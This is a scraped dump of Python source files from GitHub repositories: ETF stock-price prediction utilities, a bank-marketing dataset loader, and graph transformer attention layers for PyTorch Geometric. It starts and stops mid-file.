encoding='big5-hkscs', thousands=',')\n except:\n df = pd.read_csv(filepath, encoding='utf8', thousands=',')\n if stock_id is not None:\n # Extracting/Filtering the training dataset by stock_id\n column = df.columns[0]\n query_stock_id = df[column] == stock_id\n df = df[query_stock_id]\n return df\n\n\ndef get_model_name(stock_id):\n return 'etf_{}_model.h5'.format(stock_id)\n\n\ndef query_open_price(dataset, stock_id):\n \"\"\"\n Query open stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 開盤價\n return dataset.iloc[:, 3:4].values\n\n\ndef query_close_price(dataset, stock_id):\n \"\"\"\n Query close stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n vol_column = dataset.columns[7]\n dataset = dataset.loc[dataset[column]==stock_id]\n # Dropping row if volume == 0\n dataset = dataset.loc[dataset[vol_column]>0]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 收盤價\n return dataset.iloc[:, 6:7].values\n\n\ndef query_high_price(dataset, stock_id):\n \"\"\"\n Query high stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 高價\n return dataset.iloc[:, 4:5].values\n\n\ndef query_low_price(dataset, stock_id):\n \"\"\"\n Query low stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 低價\n return dataset.iloc[:, 5:6].values\n\n\ndef query_avg_price(dataset, stock_id):\n \"\"\"\n Query avg stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id 
{}'.format(stock_id)\n # Returning 高低價平均\n return dataset.iloc[:, 4:6].mean(axis=1).values.reshape(-1, 1)\n\n\ndef query_volume(dataset, stock_id):\n \"\"\"\n Query volume by stock id.\n Arguments:\n dataset: Full historical volume as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of volume as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n vol_column = dataset.columns[7]\n dataset = dataset.loc[dataset[column] == stock_id]\n # Dropping row if volume == 0\n dataset = dataset.loc[dataset[vol_column]>0]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 成交量\n return dataset.iloc[:, 7:8].values\n\n\ndef load_weighted_csv(filepath, stock_df):\n print('historical weighted stock price is loading from {}'.format(filepath))\n assert type(stock_df) is pd.DataFrame, 'unexpected type of series: {}'.format(type(stock_df))\n try:\n df = pd.read_csv(filepath, encoding='big5-hkscs', thousands=',')\n except:\n df = pd.read_csv(filepath, encoding='utf8', thousands=',')\n # Extracting/Filtering the training dataset by date range from stokc_df\n date = stock_df[stock_df.columns[1]]\n query_date_range = df['date'].isin(date)\n df = df[query_date_range]\n assert stock_df.shape[0] == df.shape[0], 'dataframe size does not match stock_df({}) df({})'.format(stock_df.shape[0], df.shape[0])\n return df\n\n\ndef query_weighted_open_price(dataset):\n \"\"\"\n Query weighted open stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 1:2].values\n\n\ndef query_weighted_close_price(dataset):\n \"\"\"\n Query weighted close stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 4:5].values\n\n\ndef query_weighted_high_price(dataset):\n \"\"\"\n Query weighted high stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 2:3].values\n\n\ndef query_weighted_low_price(dataset):\n \"\"\"\n Query weighted low stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 3:4].values\n\n\ndef query_weighted_avg_price(dataset):\n \"\"\"\n Query weighted avg stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 高低價平均\n return dataset.iloc[:, 2:4].mean(axis=1).values.reshape(-1, 1)\n\n\ndef plot_stock_price(series, first_ndays=0, last_ndays=0, filename=None):\n \"\"\"\n Plot stock price.\n Arguments:\n series: Sequence of observations 
as a NumPy array.\n first_ndays, last_ndays:\n If both are 0, plot whole series, otherwise plot first N days or plot last N days instead.\n Returns:\n N/A\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n if first_ndays == 0 and last_ndays == 0:\n plt.plot(series, color='blue', label='Stock Price')\n elif first_ndays > 0:\n plt.plot(series[:first_ndays, :], color='blue', label='Stock Price')\n else:\n plt.plot(series[-last_ndays:, :], color='blue', label='Stock Price')\n plt.title('Stock Price')\n plt.xlabel('Time')\n plt.ylabel('Stock Price')\n plt.legend()\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n else:\n plt.show()\n\n\ndef plot_real_predicted_stock_price(real_price, predicted_price, title, first_ndays=0, last_ndays=0, filename=None):\n \"\"\"\n Plot stock price.\n Arguments:\n real_price: Sequence of real price as a NumPy array.\n predicted_price: Sequence of predicted price as a NumPy array.\n first_ndays, last_ndays:\n If both are 0, plot whole series, otherwise plot first N days or plot last N days instead.\n Returns:\n N/A\n \"\"\"\n assert type(real_price) is np.ndarray, 'unexpected type of real_price: {}'.format(type(real_price))\n assert type(predicted_price) is np.ndarray, 'unexpected type of predicted_price: {}'.format(type(predicted_price))\n assert(real_price.shape[0] == predicted_price.shape[0])\n if first_ndays == 0 and last_ndays == 0:\n plt.plot(real_price, color='red', label='Real Price')\n plt.plot(predicted_price, color='blue', label='Predicted Price')\n elif first_ndays > 0:\n plt.plot(real_price[:first_ndays, :], color='red', label='Real Price')\n plt.plot(predicted_price[:first_ndays, :], color='blue', label='Predicted Price')\n else:\n plt.plot(real_price[-last_ndays:, :], color='red', label='Real Price')\n plt.plot(predicted_price[-last_ndays:, :], color='blue', label='Predicted Price')\n plt.title(title)\n plt.xlabel('Time')\n plt.ylabel('Stock Price')\n plt.legend()\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n else:\n plt.show()\n\n\ndef moving_average(series, window=5):\n \"\"\"\n Calculating moving average of a time series dataset.\n Arguments:\n series: Sequence of observations as a NumPy array.\n window: Size of the moving window.\n This is the number of observations used for calculating the statistic.\n Returns:\n Moving average of stock price as a NumPy array.\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n\n dataset_ma = pd.DataFrame(series).rolling(window=window).mean().values\n\n # calculating first N=window values instead of NaN\n sum = 0\n for i in range(window):\n sum += series[i]\n dataset_ma[i] = sum/(i+1)\n\n return dataset_ma\n\n\ndef series_to_supervised(series, n_in, n_out):\n \"\"\"\n Frame a time series as a supervised learning dataset.\n Arguments:\n series: Sequence of observations as a NumPy array.\n n_in: Number of observations as input (X).\n n_out: Number of observations as output (y).\n Returns:\n NumPy array of series for supervised learning.\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n assert(series.shape[0] > n_in + n_out)\n assert(series.shape[1] == 1)\n # Composing time sequence dataset with timesteps + target\n supervised = []\n for i in range(n_in, len(series) - n_out + 1):\n supervised.append(series[i - n_in:i + n_out, 0])\n return supervised\n\n\ndef normalize_windows(series):\n \"\"\"\n Normalize dataset to improve the 
convergence\n Normalize each value to reflect the percentage changes from starting point.\n Arguments:\n series: Sequence of observations as a list of NumPy arrays.\n Returns:\n NumPy array of normalized series for supervised learning.\n \"\"\"\n assert type(series) is list, 'unexpected type of series: {}'.format(type(series))\n assert type(series[0]) is np.ndarray, 'unexpected type of series: {}'.format(type(series[0]))\n df = pd.DataFrame(series)\n df = df.div(df[0], axis=0) - 1\n # replace NaN and Inf with 0\n df = df.fillna(0).replace(np.inf, 0)\n return df.values\n\n\ndef predict_split(Xy):\n \"\"\"\n Split supervised learning dataset into predicting sets\n Arguments:\n Xy: Two dimensions of sequence observations as a NumPy array.\n \"\"\"\n assert type(Xy) is np.ndarray, 'unexpected type of Xy: {}'.format(type(Xy))\n assert(Xy.shape[0] > 1)\n\n # Historical price for prediction\n X = Xy[-1:, :]\n\n # Reshape the inputs from 2 dimensions to 3 dimensions\n # X.shape[0]: batch_size which is number of observations\n # X.shape[1]: timesteps which is look_back\n # 1: input_dim which is number of predictors\n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\n\n return X\n\n\ndef train_test_split(Xy, num_forecasts, test_samples=0):\n \"\"\"\n Split supervised learning dataset into training and testing sets\n Arguments:\n Xy: Two dimensions of sequence observations as a NumPy array.\n test_samples:\n If test_samples > 0, reserve the last test_samples days (axis 0) of\n sequence observations as test set.\n If test_samples = 0, randomly reserve 20% of sequence observations as test set.\n num_forecasts:\n Number of timesteps to be predicted based on remaining observations.\n \"\"\"\n assert type(Xy) is np.ndarray, 'unexpected type of Xy: {}'.format(type(Xy))\n assert Xy.shape[0] > test_samples, 'Xy.shape[0] is {} and test_samples is {}'.format(Xy.shape[0], test_samples)\n assert(Xy.shape[1] > num_forecasts)\n\n # Historical price for regression\n X = Xy[:, :-num_forecasts]\n # Target price for regression\n y = Xy[:, -num_forecasts:]\n\n # Splitting dataset into training and testing sets\n if test_samples > 0:\n # Select the last ndays working date for testing and the others for training.\n X_train = X[:-test_samples, :]\n y_train = y[:-test_samples, :]\n X_test = X[-test_samples:, :]\n y_test = y[-test_samples:, :]\n else:\n # Select 20% of the data for testing and 80% for training.\n # Shuffle the data in order to train in random order.\n X_train, X_test, y_train, y_test = sklearn_train_test_split(X, y, test_size=0.2, shuffle=True, random_state=0)\n\n # Reshape the inputs from 2 dimensions to 3 dimensions\n # X_train.shape[0]: batch_size which is number of observations\n # X_train.shape[1]: timesteps which is look_back\n # 1: input_dim which is number of predictors\n X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))\n X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))\n\n return X_train, X_test, y_train, y_test\n\n\ndef visualize_model(loader, model, stock_id, ndays, plot_prefix):\n X_train, y_train, X_test, y_test = loader.data_last_ndays_for_test(int(stock_id), ndays=ndays)\n X_ori_train, y_ori_train = loader.ori_train_data()\n X_ori_test, y_ori_test = loader.ori_test_data()\n\n # Normalized prediction\n real_price = y_test\n predicted_price = model.predict(X_test)\n predicted_price1 = predicted_price\n predicted_price2 = predicted_price\n\n if ndays > 1:\n real_price = np.concatenate((real_price[0], np.array(real_price)[1:, -1]))\n predicted_price1 = 
np.concatenate((predicted_price1[0], np.array(predicted_price1)[1:, -1]))\n else:\n real_price = real_price.transpose()\n predicted_price1 = predicted_price1.transpose()\n\n filename = '{}_normalized.png'.format(plot_prefix)\n plot_real_predicted_stock_price(\n real_price,\n predicted_price1,\n 'Normalized Stock Price Prediction',\n filename=filename)\n\n # Inversed transform prediction\n real_price2 = y_ori_test\n predicted_price2 = loader.inverse_transform_prediction(predicted_price)\n\n if ndays > 1:\n real_price2 = np.concatenate((real_price2[0], np.array(real_price2)[1:, -1]))\n predicted_price2 = np.concatenate((predicted_price2[0], np.array(predicted_price2)[1:, -1]))\n else:\n real_price2 = real_price2.transpose()\n predicted_price2 = predicted_price2.transpose()\n\n filename = '{}.png'.format(plot_prefix)\n plot_real_predicted_stock_price(\n real_price2,\n predicted_price2,\n 'Stock Price Prediction',\n filename=filename)\n","repo_name":"jonascheng/tw-etf-price-prediction","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37719533982","text":"import numpy as np\n\n\nclass Feature:\n\n def __init__(self, terms, weight, base_size):\n self.label = terms.pop()\n self.attributes = terms\n self.weight = weight\n self.base_size = base_size\n\n def get_attributes(self):\n return self.attributes\n\n def get_label(self):\n return self.label\n\n def get_attribute_value(self, attribute):\n return self.attributes[attribute.index]\n\n def get_attribute_at(self, index):\n return self.attributes[index]\n\n def get_weight(self):\n return self.weight\n\n def get_base_size(self):\n return self.base_size\n\n def set_attribute_value(self, median, index):\n if float(self.attributes[index]) < median:\n self.attributes[index] = \"yes\"\n else:\n self.attributes[index] = \"no\"\n\n def convert_to_numeric(self):\n for i in range(0, 16):\n self.attributes[i] = Data.data_map[i][self.attributes[i]]\n self.label = Data.labels_map[self.label]\n\n def set_unknown_attribute(self, val, index):\n self.attributes[index] = val\n\n def set_weight(self, weight):\n self.weight = weight\n\n def set_base_size(self, base_size):\n self.base_size = base_size\n\n def __eq__(self, other):\n return self.attributes == other.attributes\n\n\nclass Attribute:\n\n def __init__(self, values, index):\n self.values = values\n self.index = index\n\n def __eq__(self, other):\n return self.index == other.index\n\n\n# Define data structures\nclass Data:\n \"\"\"Data class for bank data\n\n \"\"\"\n # All class attributes below are hard-coded due to poor data-desc.txt\n age = Attribute((0, 1), 0)\n job = Attribute((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12), 1)\n marital = Attribute((0, 1, 2), 2)\n education = Attribute((0, 1, 2, 3), 3)\n default = Attribute((0, 1), 4)\n balance = Attribute((0, 1), 5)\n housing = Attribute((0, 1), 6)\n loan = Attribute((0, 1), 7)\n contact = Attribute((0, 1, 2), 8)\n day = Attribute((0, 1), 9)\n month = Attribute((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12), 10)\n duration = Attribute((0, 1), 11)\n campaign = Attribute((0, 1), 12)\n pdays = Attribute((0, 1), 13)\n previous = Attribute((0, 1), 14)\n poutcome = Attribute((0, 1, 2, 3), 15)\n\n attributes = (age, job, marital, education, default, balance, housing, loan,\n contact, day, month, duration, campaign, pdays, previous, poutcome)\n\n labels = (1, -1)\n labels_map = {\"yes\": 1, \"no\": -1}\n\n age_map = 
{\"yes\": 0, \"no\": 1}\n job_map = {\"admin.\": 0, \"unknown\": 1, \"unemployed\": 2, \"management\": 3, \"housemaid\": 4, \"entrepreneur\": 5,\n \"student\": 6, \"blue-collar\": 7, \"self-employed\": 8, \"retired\": 9, \"technician\": 10, \"services\": 11}\n marital_map = {\"married\": 0, \"divorced\": 1, \"single\": 2}\n education_map = {\"unknown\": 0, \"secondary\": 1, \"primary\": 2, \"tertiary\": 3}\n default_map = {\"yes\": 0, \"no\": 1}\n balance_map = {\"yes\": 0, \"no\": 1}\n housing_map = {\"yes\": 0, \"no\": 1}\n loan_map = {\"yes\": 0, \"no\": 1}\n contact_map = {\"unknown\": 0, \"telephone\": 1, \"cellular\": 2}\n day_map = {\"yes\": 0, \"no\": 1}\n month_map = {\"jan\": 0, \"feb\": 1, \"mar\": 2, \"apr\": 3, \"may\": 4, \"jun\": 5,\n \"jul\": 6, \"aug\": 7, \"sep\": 8, \"oct\": 9, \"nov\": 10, \"dec\": 11}\n duration_map = {\"yes\": 0, \"no\": 1}\n campaign_map = {\"yes\": 0, \"no\": 1}\n pdays_map = {\"yes\": 0, \"no\": 1}\n previous_map = {\"yes\": 0, \"no\": 1}\n poutcome_map = {\"unknown\": 0, \"other\": 1, \"failure\": 2, \"success\": 3}\n\n data_map = [age_map, job_map, marital_map, education_map, default_map, balance_map, housing_map, loan_map,\n contact_map, day_map, month_map, duration_map, campaign_map, pdays_map, previous_map, poutcome_map]\n\n def __init__(self):\n \"\"\"Data constructor\n\n \"\"\"\n self.examples = []\n\n def initialize_data_from_file(self, filepath, unknown_is_not_attribute):\n \"\"\"Initialize data from csv file\n\n :param filepath: absolute path to csv file\n :type filepath: string\n :param unknown_is_not_attribute: are 'unknown' values considered attributes?\n :type unknown_is_not_attribute: bool\n :return: None\n \"\"\"\n # Initialize necessary data structures to modify data\n ages = [] # index 0\n balances = [] # index 5\n days = [] # index 9\n durations = [] # index 11\n campaigns = [] # index 12\n pdays = [] # index 13\n previous = [] # index 14\n lists = [ages, balances, days, durations, campaigns, pdays, previous]\n\n job_distro = {\"admin.\": 0, \"unknown\": 0, \"unemployed\": 0, \"management\": 0, \"housemaid\": 0, \"entrepreneur\": 0,\n \"student\": 0, \"blue-collar\": 0, \"self-employed\": 0, \"retired\": 0, \"technician\": 0, \"services\": 0}\n education_distro = {\"unknown\": 0, \"secondary\": 0, \"primary\": 0, \"tertiary\": 0}\n contact_distro = {\"unknown\": 0, \"telephone\": 0, \"cellular\": 0}\n poutcome_distro = {\"unknown\": 0, \"other\": 0, \"failure\": 0, \"success\": 0}\n\n with open(filepath, 'r') as f:\n for line in f:\n terms = line.strip().split(',')\n self.examples.append(Feature(terms, 1.0, 0.0))\n\n ages.append(float(terms[0]))\n balances.append(float(terms[5]))\n days.append(float(terms[9]))\n durations.append(float(terms[11]))\n campaigns.append(float(terms[12]))\n pdays.append(float(terms[13]))\n previous.append(float(terms[14]))\n\n if unknown_is_not_attribute:\n job_distro[terms[1]] += 1\n education_distro[terms[3]] += 1\n contact_distro[terms[8]] += 1\n poutcome_distro[terms[15]] += 1\n\n common_elements = [get_common_element(job_distro), get_common_element(education_distro),\n get_common_element(contact_distro), get_common_element(poutcome_distro)]\n\n thresholds = []\n for i in range(0, 7):\n thresholds.append(get_median(sorted(lists[i])))\n\n for example in self.examples:\n example.set_attribute_value(thresholds[0], 0)\n example.set_attribute_value(thresholds[1], 5)\n example.set_attribute_value(thresholds[2], 9)\n example.set_attribute_value(thresholds[3], 11)\n 
example.set_attribute_value(thresholds[4], 12)\n example.set_attribute_value(thresholds[5], 13)\n example.set_attribute_value(thresholds[6], 14)\n example.set_weight(1.0)\n example.set_base_size(len(self.examples))\n\n if unknown_is_not_attribute:\n if example.get_attribute_at(1) == \"unknown\":\n example.set_unknown_attribute(common_elements[0], 1)\n if example.get_attribute_at(3) == \"unknown\":\n example.set_unknown_attribute(common_elements[1], 3)\n if example.get_attribute_at(8) == \"unknown\":\n example.set_unknown_attribute(common_elements[2], 8)\n if example.get_attribute_at(15) == \"unknown\":\n example.set_unknown_attribute(common_elements[3], 15)\n\n for example in self.examples:\n example.convert_to_numeric()\n\n def get_features(self):\n \"\"\"\n get set of features if necessary\n :return: features\n :rtype: numpy array\n \"\"\"\n features = []\n for example in self.examples:\n features.append(example.get_attributes())\n\n return np.array(features)\n\n def get_labels(self):\n \"\"\"\n get set of labels if necessary\n :return: labels\n :rtype: numpy array\n \"\"\"\n labels = []\n for example in self.examples:\n labels.append(example.get_label())\n\n return np.array(labels)\n\n\n# Get the median of a sorted list (average of the two middle values for even length)\ndef get_median(values):\n length = len(values)\n if length % 2 == 0:\n return float(values[int(length / 2)] + values[int(length / 2) - 1]) / 2.0\n else:\n return float(values[length // 2])\n\n\n# Get the key with the highest count in a dictionary\ndef get_common_element(values):\n common_key = None\n count = 0\n for key in values:\n if values[key] > count:\n count = values[key]\n common_key = key\n\n return common_key\n","repo_name":"morsgiathatch/machine_learning","sub_path":"Data/bank/BankData.py","file_name":"BankData.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38688194971","text":"from itertools import product\nfrom typing import Union, Tuple, Optional\nfrom torch_geometric.typing import (OptPairTensor, Adj, Size, NoneType,\n OptTensor)\n\nimport torch\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom torch.nn import Parameter, Linear\nfrom torch_sparse import SparseTensor, set_diag\nfrom torch_geometric.nn.conv import MessagePassing\nfrom torch_geometric.utils import remove_self_loops, add_self_loops, softmax\n\nfrom torch_geometric.nn.inits import glorot, zeros\n\nfrom parseq.transformer import TransformerConfig, TransformerLayerFF\n\n\nFACTOR = 1.\n\n\nclass TransformerAttentionConv(MessagePassing):\n def __init__(self, config: TransformerConfig):\n super().__init__(node_dim=0)\n self.config = config\n # self.is_decoder = config.is_decoder\n\n self.d_model = config.d_model\n self.d_kv = config.d_kv\n self.n_heads = config.num_heads\n self.inner_dim = self.n_heads * self.d_kv\n\n # Mesh TensorFlow initialization to avoid scaling before softmax\n self.q = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.k = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.v = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.o = torch.nn.Linear(self.inner_dim, self.d_model, bias=False)\n\n self.layer_norm = torch.nn.LayerNorm(config.d_model, eps=config.layer_norm_epsilon)\n self.dropout = torch.nn.Dropout(config.dropout_rate)\n self.attn_dropout = torch.nn.Dropout(config.attention_dropout_rate)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n d_model = self.config.d_model\n 
d_kv = self.config.d_kv\n n_heads = self.config.num_heads\n self.q.weight.data.normal_(mean=0.0, std=FACTOR * ((d_model * d_kv) ** -0.5))\n self.k.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.v.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.o.weight.data.normal_(mean=0.0, std=FACTOR * ((n_heads * d_kv) ** -0.5))\n\n def forward(self, edge_index: Adj, x:torch.Tensor=None, kv:torch.Tensor=None):\n H, C = self.n_heads, self.d_kv\n\n assert x.dim() == 2, 'Static graphs are not supported.'\n assert kv.dim() == 2\n\n q = self.layer_norm(x)\n\n q = self.q(q).view(q.size(0), H, C)\n k = self.k(kv).view(kv.size(0), H, C)\n v = self.v(kv).view(kv.size(0), H, C)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, q=(None, q), k=(k, None), v=(v, None))\n\n out = out.view(-1, self.n_heads * self.d_kv)\n\n out = self.o(out)\n\n out = x + self.dropout(out)\n return out\n\n def message(self,\n q_i: Tensor, # query (target node i)\n k_j: Tensor, # key (source node j)\n v_j: Tensor, # value (source node j)\n edge_index_i: Tensor,\n edge_index_j: Tensor) -> Tensor:\n attention_scores = (q_i * k_j).sum(-1)\n alpha = softmax(attention_scores, edge_index_i)\n alpha = self.attn_dropout(alpha)\n ret = v_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n\nclass RelationalTransformerAttentionConv(MessagePassing):\n GATE_BIAS = 3.\n def __init__(self, config: TransformerConfig):\n super().__init__(node_dim=0)\n self.config = config\n # self.is_decoder = config.is_decoder\n\n self.d_model = config.d_model\n self.d_kv = config.d_kv\n self.n_heads = config.num_heads\n self.d_ff = config.d_ff\n self.inner_dim = self.n_heads * self.d_kv\n\n self.q = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n\n self.relA = torch.nn.Linear(self.d_model * 2, self.d_ff)\n self.relB = torch.nn.Linear(self.d_ff, self.d_model)\n self.relG = torch.nn.Linear(self.d_ff, self.d_model)\n\n self.k = torch.nn.Linear(self.d_model * 2, self.inner_dim, bias=False)\n self.v = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n\n self.o = torch.nn.Linear(self.inner_dim, self.d_model, bias=False)\n\n self.layer_norm = torch.nn.LayerNorm(config.d_model, eps=config.layer_norm_epsilon)\n self.dropout = torch.nn.Dropout(config.dropout_rate)\n self.attn_dropout = torch.nn.Dropout(config.attention_dropout_rate)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n d_model = self.config.d_model\n d_kv = self.config.d_kv\n n_heads = self.config.num_heads\n self.q.weight.data.normal_(mean=0.0, std=FACTOR * ((d_model * d_kv) ** -0.5))\n self.k.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.v.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.o.weight.data.normal_(mean=0.0, std=FACTOR * ((n_heads * d_kv) ** -0.5))\n\n def forward(self, edge_index: Adj, x:torch.Tensor=None, kv:torch.Tensor=None,\n edge_features:torch.Tensor=None):\n H, C = self.n_heads, self.d_kv\n\n assert x.dim() == 2, 'Static graphs are not supported.'\n assert kv.dim() == 2\n\n q = self.layer_norm(x)\n\n q = self.q(q).view(q.size(0), H, C)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, q=(None, q), kv=(kv, None), edge_features=edge_features)\n\n out = out.view(-1, self.n_heads * self.d_kv)\n\n out = self.o(out)\n\n out = x + self.dropout(out)\n return out\n\n def message(self,\n q_i: Tensor, # query (target node i)\n kv_j: Tensor, # key/value input (source node j)\n edge_index_i: Tensor,\n 
edge_index_j: Tensor,\n edge_features: torch.Tensor=None) -> Tensor:\n assert edge_features is not None, \"'edge_features' can not be None\"\n\n H, C = self.n_heads, self.d_kv\n\n inter_k = torch.celu(self.relA(torch.cat([kv_j, edge_features], -1)))\n k_gate = torch.sigmoid(self.relG(inter_k) + self.GATE_BIAS)\n k_add = self.relB(inter_k)\n _kv_j = kv_j * k_gate + k_add * (1 - k_gate)\n k_j = self.k(torch.cat([_kv_j, edge_features], -1)).view(_kv_j.size(0), H, C)\n v_j = self.v(_kv_j).view(_kv_j.size(0), H, C)\n\n attention_scores = (q_i * k_j).sum(-1)\n alpha = softmax(attention_scores, edge_index_i)\n alpha = self.attn_dropout(alpha)\n\n ret = v_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n\nclass TransformerConv(MessagePassing):\n def __init__(self,\n config:TransformerConfig,\n **kw):\n super().__init__()\n self.is_decoder = config.is_decoder\n self.layer = torch.nn.ModuleList()\n self.layer.append(TransformerAttentionConv(config))\n if self.is_decoder:\n self.layer.append(TransformerAttentionConv(config))\n\n self.layer.append(TransformerLayerFF(config))\n\n def forward(self,\n states: torch.Tensor,\n edge_index: Adj,\n ctx_states=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n\n self_attn_out = self.layer[0](edge_index, x=states, kv=states)\n states = self_attn_out\n if self.is_decoder:\n assert(ctx_states is not None and ctx_edge_index is not None)\n ctx_attn_out = self.layer[1](ctx_edge_index, x=states, kv=ctx_states)\n states = ctx_attn_out\n\n states = self.layer[-1](states)\n return states\n\n\nclass RelationalTransformerConv(MessagePassing):\n def __init__(self,\n config:TransformerConfig,\n **kw):\n super().__init__()\n self.is_decoder = config.is_decoder\n self.layer = torch.nn.ModuleList()\n self.layer.append(RelationalTransformerAttentionConv(config))\n if self.is_decoder:\n self.layer.append(TransformerAttentionConv(config))\n\n self.layer.append(TransformerLayerFF(config))\n\n def forward(self,\n states: torch.Tensor,\n edge_index: Adj,\n edge_features: torch.Tensor=None,\n ctx_states=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n\n self_attn_out = self.layer[0](edge_index, x=states, kv=states, edge_features=edge_features)\n states = self_attn_out\n if self.is_decoder:\n assert(ctx_states is not None and ctx_edge_index is not None)\n ctx_attn_out = self.layer[1](ctx_edge_index, x=states, kv=ctx_states)\n states = ctx_attn_out\n\n states = self.layer[-1](states)\n return states\n\n\nclass RelationalTransformer(torch.nn.Module):\n def __init__(self, config:TransformerConfig, **kw):\n super(RelationalTransformer, self).__init__(**kw)\n self.config = config\n self.hdim = self.config.d_model\n self.vocabsize = self.config.vocab_size\n self.relvocabsize = self.config.relvocab_size\n\n self.node_emb = torch.nn.Embedding(self.vocabsize, self.hdim)\n self.edge_emb = torch.nn.Embedding(self.relvocabsize, self.hdim)\n\n self.layers = torch.nn.ModuleList()\n for i in range(self.config.num_layers):\n layer = RelationalTransformerConv(config=config)\n self.layers.append(layer)\n\n def forward(self,\n node_ids: torch.Tensor,\n edge_index: Adj,\n edge_ids: torch.Tensor,\n ctx: torch.Tensor=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n node_states = self.node_emb(node_ids)\n edge_feats = self.edge_emb(edge_ids)\n\n for layer in self.layers:\n node_states = layer(node_states, edge_index, 